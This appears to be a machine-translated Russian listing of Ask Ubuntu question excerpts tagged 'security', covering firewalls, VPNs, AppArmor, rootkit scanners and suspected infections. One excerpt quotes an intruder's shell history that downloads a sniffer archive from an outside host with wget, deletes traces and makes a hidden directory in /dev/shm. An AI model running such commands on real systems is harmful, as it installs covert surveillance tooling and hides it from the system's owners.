Вопросы с тегом «security»

Я уже давно пользуюсь Linux и всегда чувствую необходимость в пассивной настройке программного обеспечения / скриптов, которая может предупреждать меня о любых подозрительных действиях в сети, таких как сканирование, неудачные попытки входа в систему и т. Д., На лету по электронной почте или визуальные / аудио уведомления. Я знаю, как …

27 software-recommendation  security  firewall  logs 

Не могу найти ни одного бесплатного провайдера VPN для Ubuntu. Я пытался изучить старые вопросы, но они, кажется, устарели.

27 security  vpn  privacy 

Недавно я приобрел Yubikey Neo - изящное маленькое аппаратное устройство для аутентификации второго фактора. Он в первую очередь предназначен для использования с одноразовыми паролями и новым протоколом U2F - но начиная с версии 2 Yubikey он также поддерживает аутентификацию HMAC-SHA1 по запросу-ответу. HMAC-SHA1 объединяет секретный ключ (хранится внутри Yubikey) и …

27 password  security  encryption  luks  yubikey 

Моя корпоративная политика гласит, что блоки Linux должны быть защищены с помощью SELinux (чтобы аудитор безопасности мог установить флажок «да, мы чрезвычайно безопасны!» Для каждого сервера). Я надеялся воспользоваться потрясающей по умолчанию безопасностью AppArmor в Ubuntu. Разумно ли запускать и Apparmor, и SELinux? (Если так, может ли эта плохая идея …

27 security  permissions  apparmor 

Ubuntu поставляется с предустановленным или автоматическим брандмауэром? Если нет, нужен ли он мне? Я прочитал несколько статей о преимуществах Linux над другими операционными системами в отношении безопасности (не нужно иметь антивирус, ...), но я хотел бы быть уверен.

26 security  firewall 

Я на 99,9% уверен, что моя система на моем персональном компьютере была заражена. Позвольте мне сначала высказать свое мнение, чтобы ситуация была ясна: Грубые сроки подозрительной активности и предпринятых последующих действий: 4-26 23:00 Я закончил все программы и закрыл свой ноутбук. 4-27 12:00 Я открыл свой ноутбук после того, как …

25 ssh  security  passwd-file 

Сканирование с помощью chkrootkit показывает "tcpd" как зараженный. Хотя сканирование rkhunter показывает нормально, (за исключением обычных ложных срабатываний) Должен ли я волноваться? (Я на Ubuntu 16.10 с 4.8.0-37-generic)

25 security  malware  rootkit  tcpdump  chkrootkit 

Я знаю, что пароль sudo защищает мой компьютер от локального взлома кем-то, имеющим физический доступ к нему ( правка: на самом деле это не так ). Мой пароль достаточно силен для этой цели, но я знаю, что он недостаточно силен, если кто-то может его переборить. Кто- нибудь может получить доступ …

25 password  sudo  security 

Как и 99% пользователей, я устанавливаю Ubuntu из готовых двоичных файлов. Как я могу убедиться, что эти двоичные файлы на самом деле взяты из исходного исходного кода Ubuntu? Было бы хорошо проверить, что АНБ / кто-то еще не сотрудничал ни с Ubuntu, ни с Linode (моим провайдером VPS), чтобы связываться …

25 security 

Я использую Ubuntu 10.04.1 LTS. Я запускаю rkhunter для проверки руткитов. rkhunter жалуется на следующие скрытые файлы и каталоги. Я думаю, что эти файлы не являются реальной проблемой в моей системе, но как я могу проверить, являются ли эти файлы допустимыми? [07:57:45] Checking for hidden files and directories [ Warning …

25 10.04  security  rkhunter 

Вчера я проверил свою историю команд на моем VServer. Я нашел несколько подозрительных строк. 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " . …

24 ssh  security  malware 

Я пытаюсь понять do-release-upgradeпроцесс, то есть способ, которым Ubuntu побуждает меня перейти к следующей версии Ubuntu весной или осенью. После прочтения исходных текстов ubuntu-release-upgraderя обнаружил файл / etc / update-manager / meta-release в моей системе. Этот файл использует URL-адрес HTTP для указания на http://changelogs.ubuntu.com/meta-release, где перечислены различные выпуски Ubuntu от …

24 security  do-release-upgrade 

На некоторые вопросы я хочу ответить в ответе: Как мне узнать, работает ли apparmor? Как я могу определить, хорошо ли это работает?

24 security  apparmor 

Я понимаю, что если какая-либо вредоносная программа проникнет в систему Linux, она, в лучшем случае, получит привилегию на уровне пользователя и разрушит все, что находится в пределах досягаемости конкретного пользователя, то есть собственные файлы пользователя. Но что именно мешает вредоносным программам получить доступ на уровне root? Разве это не может …

24 security 

В системе RedHat / CentOS я могу проверить установленные RPM в моей системе, используя rpm -V . Что такое Ubuntu или aptэквивалент этой команды?

24 security  apt  rpm  deb